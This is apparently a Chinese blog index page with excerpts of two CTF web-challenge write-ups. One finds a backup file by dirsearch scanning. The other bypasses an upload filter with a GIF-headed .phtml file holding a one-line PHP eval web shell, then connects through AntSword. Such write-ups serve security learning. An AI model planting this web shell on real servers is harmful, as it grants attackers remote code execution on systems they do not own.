摘要:
打开之后啥信息都没有 题目的提示是backupFile备份文件 备份文件一般的后缀名为 .rar .zip .7z .tar.gz .bak .swp .txt .html .bak可以用dirsearch 扫 链接: dirsearch. 使用,试了很多备份文件,这里的备份文件是index.php 阅读全文
posted @ 2020-10-15 00:27
夜布多
阅读(222)
评论(0)
推荐(0)
摘要:
发现让我们上传文件, 首先在桌面创建一个y.phtml的文件,内容为 GIF89a <script language="php">eval($_POST['shell']);</script> 然后我们将它上传,提交时使用bp截取,修改一下格式,再放行 我们使用蚁剑连接,猜测路径为upload 完整 阅读全文
posted @ 2020-10-15 00:07
夜布多
阅读(565)
评论(0)
推荐(0)